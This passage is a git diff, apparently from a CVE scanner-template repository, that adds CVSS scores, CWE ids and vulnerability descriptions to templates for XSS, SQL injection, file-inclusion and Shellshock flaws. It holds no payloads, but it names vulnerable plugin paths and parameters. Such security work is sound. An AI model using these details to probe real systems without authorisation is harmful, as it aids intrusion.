cves/2019/CVE-2019-13101.yaml | 5 +++++ cves/2019/CVE-2019-13462.yaml | 5 +++++ cves/2019/CVE-2019-14205.yaml | 5 +++++ cves/2019/CVE-2019-14223.yaml | 7 ++++++- cves/2019/CVE-2019-14312.yaml | 7 ++++++- cves/2019/CVE-2019-14322.yaml | 9 +++++++++ cves/2019/CVE-2019-14470.yaml | 6 ++++++ cves/2019/CVE-2019-14696.yaml | 6 ++++++ cves/2019/CVE-2019-14974.yaml | 10 +++++++++- cves/2019/CVE-2019-15043.yaml | 7 ++++++- cves/2019/CVE-2019-15107.yaml | 7 ++++++- cves/2019/CVE-2019-15501.yaml | 6 ++++++ cves/2019/CVE-2019-15713.yaml | 5 +++++ cves/2019/CVE-2019-15858.yaml | 5 +++++ cves/2019/CVE-2019-15859.yaml | 5 +++++ cves/2019/CVE-2019-15889.yaml | 5 +++++ cves/2019/CVE-2019-16097.yaml | 7 ++++++- cves/2019/CVE-2019-16278.yaml | 6 ++++++ cves/2019/CVE-2019-16313.yaml | 5 +++++ cves/2019/CVE-2019-16332.yaml | 5 +++++ cves/2019/CVE-2019-16525.yaml | 5 +++++ cves/2019/CVE-2019-1653.yaml | 5 +++++ cves/2019/CVE-2019-16662.yaml | 6 ++++++ cves/2019/CVE-2019-16759.yaml | 8 +++++++- cves/2019/CVE-2019-16920.yaml | 5 +++++ cves/2019/CVE-2019-17270.yaml | 7 ++++++- cves/2019/CVE-2019-17382.yaml | 5 +++++ cves/2019/CVE-2019-17503.yaml | 5 +++++ cves/2019/CVE-2019-17506.yaml | 5 +++++ cves/2019/CVE-2019-17538.yaml | 6 ++++++ cves/2019/CVE-2019-17558.yaml | 8 +++++++- cves/2019/CVE-2019-18393.yaml | 7 ++++++- cves/2019/CVE-2019-18394.yaml | 5 +++++ cves/2019/CVE-2019-18818.yaml | 5 +++++ cves/2019/CVE-2019-19134.yaml | 5 +++++ cves/2019/CVE-2019-19368.yaml | 5 +++++ cves/2019/CVE-2019-19781.yaml | 7 ++++++- cves/2019/CVE-2019-19908.yaml | 5 +++++ cves/2019/CVE-2019-19985.yaml | 5 +++++ cves/2019/CVE-2019-20085.yaml | 5 +++++ cves/2019/CVE-2019-20141.yaml | 5 +++++ cves/2019/CVE-2019-2588.yaml | 6 +++++- cves/2019/CVE-2019-2616.yaml | 4 ++++ cves/2019/CVE-2019-2725.yaml | 5 +++++ cves/2019/CVE-2019-2767.yaml | 4 ++++ cves/2019/CVE-2019-3396.yaml | 7 ++++++- cves/2019/CVE-2019-3401.yaml | 7 ++++++- cves/2019/CVE-2019-3402.yaml | 5 +++++ cves/2019/CVE-2019-3403.yaml | 5 +++++ cves/2019/CVE-2019-3799.yaml | 7 ++++++- cves/2019/CVE-2019-5127.yaml | 5 +++++ cves/2019/CVE-2019-5418.yaml | 6 +++++- cves/2019/CVE-2019-6112.yaml | 5 +++++ cves/2019/CVE-2019-6340.yaml | 7 ++++++- cves/2019/CVE-2019-6715.yaml | 7 +++++++ cves/2019/CVE-2019-7219.yaml | 7 ++++++- cves/2019/CVE-2019-7238.yaml | 5 +++++ cves/2019/CVE-2019-7254.yaml | 6 ++++++ cves/2019/CVE-2019-7256.yaml | 5 +++++ cves/2019/CVE-2019-7275.yaml | 8 +++++++- cves/2019/CVE-2019-7481.yaml | 5 +++++ cves/2019/CVE-2019-7609.yaml | 5 +++++ cves/2019/CVE-2019-8442.yaml | 6 +++++- cves/2019/CVE-2019-8446.yaml | 8 ++++++++ cves/2019/CVE-2019-8449.yaml | 5 +++++ cves/2019/CVE-2019-8451.yaml | 5 +++++ cves/2019/CVE-2019-8903.yaml | 5 +++++ cves/2019/CVE-2019-8937.yaml | 6 ++++++ cves/2019/CVE-2019-8982.yaml | 7 ++++++- cves/2019/CVE-2019-9041.yaml | 5 +++++ cves/2019/CVE-2019-9618.yaml | 7 ++++++- cves/2019/CVE-2019-9670.yaml | 12 ++++++++++++ cves/2019/CVE-2019-9733.yaml | 4 ++++ cves/2019/CVE-2019-9955.yaml | 7 ++++++- cves/2019/CVE-2019-9978.yaml | 7 ++++++- cves/2020/CVE-2020-0618.yaml | 5 +++++ cves/2020/CVE-2020-10148.yaml | 7 ++++++- cves/2020/CVE-2020-10546.yaml | 7 ++++++- cves/2020/CVE-2020-10547.yaml | 7 ++++++- cves/2020/CVE-2020-10548.yaml | 7 ++++++- cves/2020/CVE-2020-10549.yaml | 7 ++++++- cves/2020/CVE-2020-11034.yaml | 7 ++++++- cves/2020/CVE-2020-11110.yaml | 5 +++++ cves/2020/CVE-2020-11455.yaml | 7 ++++++- cves/2020/CVE-2020-11547.yaml | 5 +++++ cves/2020/CVE-2020-11710.yaml | 6 +++++- cves/2020/CVE-2020-11738.yaml | 5 +++++ cves/2020/CVE-2020-11853.yaml | 4 ++++ cves/2020/CVE-2020-11854.yaml | 5 +++++ cves/2020/CVE-2020-11930.yaml | 5 +++++ cves/2020/CVE-2020-11978.yaml | 5 +++++ cves/2020/CVE-2020-11991.yaml | 5 +++++ cves/2020/CVE-2020-12054.yaml | 5 +++++ cves/2020/CVE-2020-12116.yaml | 5 +++++ cves/2020/CVE-2020-12720.yaml | 5 +++++ cves/2020/CVE-2020-12800.yaml | 5 +++++ cves/2020/CVE-2020-13117.yaml | 5 +++++ cves/2020/CVE-2020-13167.yaml | 5 +++++ cves/2020/CVE-2020-13483.yaml | 7 ++++++- cves/2020/CVE-2020-13700.yaml | 5 +++++ cves/2020/CVE-2020-13927.yaml | 8 ++++++++ cves/2020/CVE-2020-13937.yaml | 5 +++++ cves/2020/CVE-2020-13942.yaml | 5 +++++ cves/2020/CVE-2020-14092.yaml | 5 +++++ cves/2020/CVE-2020-14179.yaml | 4 ++++ cves/2020/CVE-2020-14181.yaml | 5 +++++ cves/2020/CVE-2020-14413.yaml | 5 +++++ cves/2020/CVE-2020-14864.yaml | 4 ++++ cves/2020/CVE-2020-14882.yaml | 4 ++++ cves/2020/CVE-2020-14883.yaml | 6 +++++- cves/2020/CVE-2020-15129.yaml | 5 +++++ cves/2020/CVE-2020-15148.yaml | 8 +++++++- cves/2020/CVE-2020-15227.yaml | 7 ++++++- cves/2020/CVE-2020-15500.yaml | 6 ++++++ cves/2020/CVE-2020-15505.yaml | 4 ++++ cves/2020/CVE-2020-15568.yaml | 5 +++++ cves/2020/CVE-2020-15920.yaml | 5 +++++ cves/2020/CVE-2020-16139.yaml | 6 +++++- cves/2020/CVE-2020-16846.yaml | 5 +++++ cves/2020/CVE-2020-16952.yaml | 7 ++++++- cves/2020/CVE-2020-17362.yaml | 5 +++++ cves/2020/CVE-2020-17453.yaml | 5 +++++ cves/2020/CVE-2020-17496.yaml | 5 +++++ cves/2020/CVE-2020-17505.yaml | 5 +++++ cves/2020/CVE-2020-17506.yaml | 5 +++++ cves/2020/CVE-2020-17518.yaml | 7 ++++++- cves/2020/CVE-2020-17519.yaml | 5 +++++ cves/2020/CVE-2020-17530.yaml | 5 +++++ cves/2020/CVE-2020-1938.yaml | 8 +++++++- cves/2020/CVE-2020-1943.yaml | 5 +++++ cves/2020/CVE-2020-19625.yaml | 6 +++++- cves/2020/CVE-2020-2036.yaml | 7 ++++++- cves/2020/CVE-2020-2096.yaml | 5 +++++ cves/2020/CVE-2020-21224.yaml | 5 +++++ cves/2020/CVE-2020-2140.yaml | 5 +++++ cves/2020/CVE-2020-22840.yaml | 11 ++++++++++- cves/2020/CVE-2020-23517.yaml | 5 +++++ cves/2020/CVE-2020-23972.yaml | 5 +++++ cves/2020/CVE-2020-24148.yaml | 5 +++++ cves/2020/CVE-2020-24186.yaml | 5 +++++ cves/2020/CVE-2020-24223.yaml | 5 +++++ cves/2020/CVE-2020-24312.yaml | 5 +++++ cves/2020/CVE-2020-24550.yaml | 5 +++++ cves/2020/CVE-2020-24571.yaml | 5 +++++ cves/2020/CVE-2020-24579.yaml | 7 ++++++- cves/2020/CVE-2020-24949.yaml | 4 ++++ cves/2020/CVE-2020-25078.yaml | 4 ++++ cves/2020/CVE-2020-25213.yaml | 5 +++++ cves/2020/CVE-2020-25223.yaml | 4 ++++ cves/2020/CVE-2020-25495.yaml | 5 +++++ cves/2020/CVE-2020-25506.yaml | 5 +++++ cves/2020/CVE-2020-2551.yaml | 4 ++++ cves/2020/CVE-2020-25540.yaml | 7 ++++++- cves/2020/CVE-2020-26153.yaml | 5 +++++ cves/2020/CVE-2020-26214.yaml | 5 +++++ cves/2020/CVE-2020-26919.yaml | 4 ++++ cves/2020/CVE-2020-26948.yaml | 5 +++++ cves/2020/CVE-2020-27361.yaml | 5 +++++ cves/2020/CVE-2020-27735.yaml | 5 +++++ cves/2020/CVE-2020-27866.yaml | 5 +++++ cves/2020/CVE-2020-27982.yaml | 5 +++++ cves/2020/CVE-2020-27986.yaml | 7 ++++++- cves/2020/CVE-2020-28188.yaml | 5 +++++ cves/2020/CVE-2020-28208.yaml | 5 +++++ cves/2020/CVE-2020-28871.yaml | 5 +++++ cves/2020/CVE-2020-28976.yaml | 7 ++++++- cves/2020/CVE-2020-29164.yaml | 5 +++++ cves/2020/CVE-2020-29227.yaml | 6 +++++- cves/2020/CVE-2020-29395.yaml | 5 +++++ cves/2020/CVE-2020-29453.yaml | 5 +++++ cves/2020/CVE-2020-3187.yaml | 7 ++++++- cves/2020/CVE-2020-3452.yaml | 7 ++++++- cves/2020/CVE-2020-35338.yaml | 5 +++++ cves/2020/CVE-2020-35476.yaml | 5 +++++ cves/2020/CVE-2020-35489.yaml | 5 +++++ cves/2020/CVE-2020-35580.yaml | 5 +++++ cves/2020/CVE-2020-35598.yaml | 5 +++++ cves/2020/CVE-2020-35713.yaml | 5 +++++ cves/2020/CVE-2020-35729.yaml | 5 +++++ cves/2020/CVE-2020-35736.yaml | 5 +++++ cves/2020/CVE-2020-35774.yaml | 5 +++++ cves/2020/CVE-2020-3580.yaml | 5 +++++ cves/2020/CVE-2020-35846.yaml | 5 +++++ cves/2020/CVE-2020-35847.yaml | 5 +++++ cves/2020/CVE-2020-35848.yaml | 5 +++++ cves/2020/CVE-2020-35951.yaml | 5 +++++ cves/2020/CVE-2020-36112.yaml | 5 +++++ cves/2020/CVE-2020-36289.yaml | 5 +++++ cves/2020/CVE-2020-4463.yaml | 5 +++++ cves/2020/CVE-2020-5284.yaml | 5 +++++ cves/2020/CVE-2020-5307.yaml | 5 +++++ cves/2020/CVE-2020-5405.yaml | 7 ++++++- cves/2020/CVE-2020-5410.yaml | 5 +++++ cves/2020/CVE-2020-5412.yaml | 5 +++++ cves/2020/CVE-2020-5776.yaml | 5 +++++ cves/2020/CVE-2020-5777.yaml | 7 ++++++- cves/2020/CVE-2020-5847.yaml | 7 ++++++- cves/2020/CVE-2020-5902.yaml | 7 ++++++- cves/2020/CVE-2020-6207.yaml | 5 +++++ cves/2020/CVE-2020-6287.yaml | 5 +++++ cves/2020/CVE-2020-6308.yaml | 6 ++++++ cves/2020/CVE-2020-6637.yaml | 7 ++++++- cves/2020/CVE-2020-7209.yaml | 4 ++++ cves/2020/CVE-2020-7247.yaml | 6 ++++++ cves/2020/CVE-2020-7318.yaml | 5 +++++ cves/2020/CVE-2020-7796.yaml | 5 +++++ cves/2020/CVE-2020-7961.yaml | 5 +++++ cves/2020/CVE-2020-8091.yaml | 5 +++++ cves/2020/CVE-2020-8115.yaml | 5 +++++ cves/2020/CVE-2020-8163.yaml | 5 +++++ cves/2020/CVE-2020-8191.yaml | 7 ++++++- cves/2020/CVE-2020-8193.yaml | 7 ++++++- cves/2020/CVE-2020-8194.yaml | 7 ++++++- cves/2020/CVE-2020-8209.yaml | 5 +++++ cves/2020/CVE-2020-8512.yaml | 5 +++++ cves/2020/CVE-2020-8515.yaml | 5 +++++ cves/2020/CVE-2020-8771.yaml | 6 ++++++ cves/2020/CVE-2020-8813.yaml | 7 ++++++- cves/2020/CVE-2020-8982.yaml | 5 +++++ cves/2020/CVE-2020-9036.yaml | 6 ++++++ cves/2020/CVE-2020-9047.yaml | 5 +++++ cves/2020/CVE-2020-9054.yaml | 5 +++++ cves/2020/CVE-2020-9315.yaml | 6 ++++++ cves/2020/CVE-2020-9344.yaml | 5 +++++ cves/2020/CVE-2020-9376.yaml | 5 +++++ cves/2020/CVE-2020-9402.yaml | 5 +++++ cves/2020/CVE-2020-9425.yaml | 5 +++++ cves/2020/CVE-2020-9483.yaml | 5 +++++ cves/2020/CVE-2020-9484.yaml | 5 +++++ cves/2020/CVE-2020-9490.yaml | 7 ++++++- cves/2020/CVE-2020-9496.yaml | 5 +++++ cves/2020/CVE-2020-9757.yaml | 10 ++++++++++ cves/2021/CVE-2021-1497.yaml | 5 +++++ cves/2021/CVE-2021-20090.yaml | 5 +++++ cves/2021/CVE-2021-20091.yaml | 6 +++++- cves/2021/CVE-2021-20092.yaml | 7 ++++++- cves/2021/CVE-2021-20114.yaml | 5 +++++ cves/2021/CVE-2021-21234.yaml | 5 +++++ cves/2021/CVE-2021-21307.yaml | 5 +++++ cves/2021/CVE-2021-21315.yaml | 5 +++++ cves/2021/CVE-2021-21389.yaml | 7 ++++++- cves/2021/CVE-2021-21402.yaml | 7 ++++++- cves/2021/CVE-2021-21479.yaml | 5 +++++ cves/2021/CVE-2021-21801.yaml | 5 +++++ cves/2021/CVE-2021-21802.yaml | 5 +++++ cves/2021/CVE-2021-21803.yaml | 5 +++++ cves/2021/CVE-2021-21816.yaml | 5 +++++ cves/2021/CVE-2021-21972.yaml | 5 +++++ cves/2021/CVE-2021-21975.yaml | 7 ++++++- cves/2021/CVE-2021-21978.yaml | 5 +++++ cves/2021/CVE-2021-21985.yaml | 5 +++++ cves/2021/CVE-2021-22122.yaml | 5 +++++ cves/2021/CVE-2021-22145.yaml | 5 +++++ cves/2021/CVE-2021-22214.yaml | 7 ++++++- cves/2021/CVE-2021-22873.yaml | 7 ++++++- cves/2021/CVE-2021-22986.yaml | 4 ++++ cves/2021/CVE-2021-23241.yaml | 5 +++++ cves/2021/CVE-2021-24146.yaml | 5 +++++ cves/2021/CVE-2021-24176.yaml | 5 +++++ cves/2021/CVE-2021-24210.yaml | 7 ++++++- cves/2021/CVE-2021-24235.yaml | 6 ++++++ cves/2021/CVE-2021-24237.yaml | 5 +++++ cves/2021/CVE-2021-24285.yaml | 5 +++++ cves/2021/CVE-2021-24288.yaml | 5 +++++ cves/2021/CVE-2021-24291.yaml | 5 +++++ cves/2021/CVE-2021-24298.yaml | 5 +++++ cves/2021/CVE-2021-24316.yaml | 5 +++++ cves/2021/CVE-2021-24320.yaml | 5 +++++ cves/2021/CVE-2021-24335.yaml | 5 +++++ cves/2021/CVE-2021-24340.yaml | 7 ++++++- cves/2021/CVE-2021-24387.yaml | 5 +++++ cves/2021/CVE-2021-24389.yaml | 5 +++++ cves/2021/CVE-2021-24406.yaml | 7 ++++++- cves/2021/CVE-2021-24472.yaml | 7 ++++++- cves/2021/CVE-2021-24495.yaml | 5 +++++ cves/2021/CVE-2021-24498.yaml | 5 +++++ cves/2021/CVE-2021-25281.yaml | 5 +++++ cves/2021/CVE-2021-25646.yaml | 7 ++++++- cves/2021/CVE-2021-26084.yaml | 5 +++++ cves/2021/CVE-2021-26086.yaml | 5 +++++ cves/2021/CVE-2021-26295.yaml | 5 +++++ cves/2021/CVE-2021-26475.yaml | 5 +++++ cves/2021/CVE-2021-26710.yaml | 5 +++++ cves/2021/CVE-2021-26722.yaml | 5 +++++ cves/2021/CVE-2021-26723.yaml | 5 +++++ cves/2021/CVE-2021-26812.yaml | 5 +++++ cves/2021/CVE-2021-26855.yaml | 4 ++++ cves/2021/CVE-2021-27132.yaml | 10 +++++++++- cves/2021/CVE-2021-27330.yaml | 5 +++++ cves/2021/CVE-2021-27651.yaml | 5 +++++ cves/2021/CVE-2021-27850.yaml | 5 +++++ cves/2021/CVE-2021-27905.yaml | 7 ++++++- cves/2021/CVE-2021-28149.yaml | 5 +++++ cves/2021/CVE-2021-28150.yaml | 5 +++++ cves/2021/CVE-2021-28151.yaml | 5 +++++ cves/2021/CVE-2021-28164.yaml | 5 +++++ cves/2021/CVE-2021-28169.yaml | 5 +++++ cves/2021/CVE-2021-28918.yaml | 5 +++++ cves/2021/CVE-2021-28937.yaml | 7 ++++++- cves/2021/CVE-2021-29156.yaml | 5 +++++ cves/2021/CVE-2021-29203.yaml | 5 +++++ cves/2021/CVE-2021-29441.yaml | 7 ++++++- cves/2021/CVE-2021-29442.yaml | 5 +++++ cves/2021/CVE-2021-29484.yaml | 5 +++++ cves/2021/CVE-2021-29622.yaml | 5 +++++ cves/2021/CVE-2021-29625.yaml | 5 +++++ cves/2021/CVE-2021-30151.yaml | 7 ++++++- cves/2021/CVE-2021-3017.yaml | 4 ++++ cves/2021/CVE-2021-3019.yaml | 7 ++++++- cves/2021/CVE-2021-30461.yaml | 5 +++++ cves/2021/CVE-2021-31249.yaml | 4 ++++ cves/2021/CVE-2021-31250.yaml | 5 +++++ cves/2021/CVE-2021-3129.yaml | 4 ++++ cves/2021/CVE-2021-31537.yaml | 5 +++++ cves/2021/CVE-2021-31581.yaml | 6 ++++++ cves/2021/CVE-2021-31755.yaml | 5 +++++ cves/2021/CVE-2021-31856.yaml | 5 +++++ cves/2021/CVE-2021-32030.yaml | 7 ++++++- cves/2021/CVE-2021-3223.yaml | 5 +++++ cves/2021/CVE-2021-32305.yaml | 5 +++++ cves/2021/CVE-2021-32819.yaml | 6 +++++- cves/2021/CVE-2021-32820.yaml | 8 +++++++- cves/2021/CVE-2021-3297.yaml | 5 +++++ cves/2021/CVE-2021-33221.yaml | 7 ++++++- cves/2021/CVE-2021-33564.yaml | 6 ++++++ cves/2021/CVE-2021-3374.yaml | 5 +++++ cves/2021/CVE-2021-3377.yaml | 5 +++++ cves/2021/CVE-2021-3378.yaml | 5 +++++ cves/2021/CVE-2021-33807.yaml | 5 +++++ cves/2021/CVE-2021-33904.yaml | 5 +++++ cves/2021/CVE-2021-34370.yaml | 5 +++++ cves/2021/CVE-2021-34429.yaml | 5 +++++ cves/2021/CVE-2021-34473.yaml | 4 ++++ cves/2021/CVE-2021-34621.yaml | 6 ++++++ cves/2021/CVE-2021-35464.yaml | 5 +++++ cves/2021/CVE-2021-36380.yaml | 5 +++++ cves/2021/CVE-2021-37216.yaml | 5 +++++ cves/2021/CVE-2021-37538.yaml | 7 ++++++- cves/2021/CVE-2021-37573.yaml | 6 ++++++ cves/2021/CVE-2021-37704.yaml | 7 ++++++- cves/2021/CVE-2021-38702.yaml | 5 +++++ cves/2021/CVE-2021-38751.yaml | 5 +++++ 547 files changed, 2998 insertions(+), 143 deletions(-) diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 05714d8b90..1fe124e5d4 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -10,6 +10,11 @@ info: - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 tags: cve,cve2011,xss,tikiwiki + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2011-4336 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml index d7ca7ac309..ed80489fb4 100644 --- a/cves/2012/CVE-2012-4242.yaml +++ b/cves/2012/CVE-2012-4242.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242 tags: cve,cve2012,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page." requests: - method: GET diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml index 05ae7013e2..4b827a6e88 100644 --- a/cves/2013/CVE-2013-2287.yaml +++ b/cves/2013/CVE-2013-2287.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287 tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Multiple cross-site scripting (XSS) vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter." requests: - method: GET diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml index b081219b53..a65162e1be 100644 --- a/cves/2013/CVE-2013-3526.yaml +++ b/cves/2013/CVE-2013-3526.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-2323.yaml b/cves/2014/CVE-2014-2323.yaml index e4dff03126..61d21ce54c 100644 --- a/cves/2014/CVE-2014-2323.yaml +++ b/cves/2014/CVE-2014-2323.yaml @@ -7,6 +7,11 @@ info: author: geeknik severity: critical tags: cve,cve2014,sqli,lighttpd + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-2323 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2014/CVE-2014-3744.yaml b/cves/2014/CVE-2014-3744.yaml index d25a27bc60..b593394d70 100644 --- a/cves/2014/CVE-2014-3744.yaml +++ b/cves/2014/CVE-2014-3744.yaml @@ -9,6 +9,11 @@ info: - https://snyk.io/vuln/npm:st:20140206 severity: high tags: cve,cve2014,lfi,nodejs,st + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2014-3744 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2014/CVE-2014-4210.yaml b/cves/2014/CVE-2014-4210.yaml index cc9b0f8793..42932519fa 100644 --- a/cves/2014/CVE-2014-4210.yaml +++ b/cves/2014/CVE-2014-4210.yaml @@ -8,6 +8,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4210 - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html + description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services." requests: - method: GET diff --git a/cves/2014/CVE-2014-4535.yaml b/cves/2014/CVE-2014-4535.yaml index 95bd42d005..8e6d8424d8 100644 --- a/cves/2014/CVE-2014-4535.yaml +++ b/cves/2014/CVE-2014-4535.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4535 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." requests: - method: GET diff --git a/cves/2014/CVE-2014-4536.yaml b/cves/2014/CVE-2014-4536.yaml index d1f974d279..d226a920db 100644 --- a/cves/2014/CVE-2014-4536.yaml +++ b/cves/2014/CVE-2014-4536.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4536 + cwe-id: CWE-79 + description: "Multiple cross-site scripting (XSS) vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter." requests: - method: GET diff --git a/cves/2014/CVE-2014-6271.yaml b/cves/2014/CVE-2014-6271.yaml index 07e8d11779..6c5db06412 100644 --- a/cves/2014/CVE-2014-6271.yaml +++ b/cves/2014/CVE-2014-6271.yaml @@ -3,13 +3,18 @@ id: CVE-2014-6271 info: name: Shellshock author: pentest_swissky - severity: high + severity: critical description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications reference: - http://www.kb.cert.org/vuls/id/252743 - http://www.us-cert.gov/ncas/alerts/TA14-268A tags: cve,cve2014,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2014-6271 + cwe-id: CWE-78 requests: - method: GET path: diff --git a/cves/2014/CVE-2014-6308.yaml b/cves/2014/CVE-2014-6308.yaml index bc9fe62650..7b52384af9 100644 --- a/cves/2014/CVE-2014-6308.yaml +++ b/cves/2014/CVE-2014-6308.yaml @@ -6,6 +6,7 @@ info: severity: high reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html tags: cve,cve2014,lfi + description: "Directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php." requests: - method: GET diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml index 81ae8ce817..12b29d2090 100644 --- a/cves/2014/CVE-2014-9094.yaml +++ b/cves/2014/CVE-2014-9094.yaml @@ -6,6 +6,7 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 tags: cve,2014,wordpress,xss,wp-plugin + description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index b9a13af787..75c35ff769 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-1000012 + cwe-id: CWE-200 + description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin" requests: - method: GET diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml index f70ef7d40a..67ed7522de 100644 --- a/cves/2015/CVE-2015-2080.yaml +++ b/cves/2015/CVE-2015-2080.yaml @@ -3,7 +3,7 @@ id: CVE-2015-2080 info: name: Eclipse Jetty Remote Leakage author: pikpikcu - severity: medium + severity: high reference: - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html @@ -11,6 +11,11 @@ info: description: | The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak tags: cve,cve2015,jetty + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-2080 + cwe-id: CWE-200 requests: - method: POST diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml index ddb93e60fb..b39565c245 100644 --- a/cves/2015/CVE-2015-2807.yaml +++ b/cves/2015/CVE-2015-2807.yaml @@ -8,6 +8,7 @@ info: - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 tags: cve,cve2015,wordpress,wp-plugin,xss + description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter." requests: - method: GET diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml index 63d74145e0..23b0e18646 100644 --- a/cves/2015/CVE-2015-6544.yaml +++ b/cves/2015/CVE-2015-6544.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 tags: cve,cve2015,xss,itop + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-6544 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml index cc437482ec..266da313a8 100644 --- a/cves/2015/CVE-2015-8349.yaml +++ b/cves/2015/CVE-2015-8349.yaml @@ -7,6 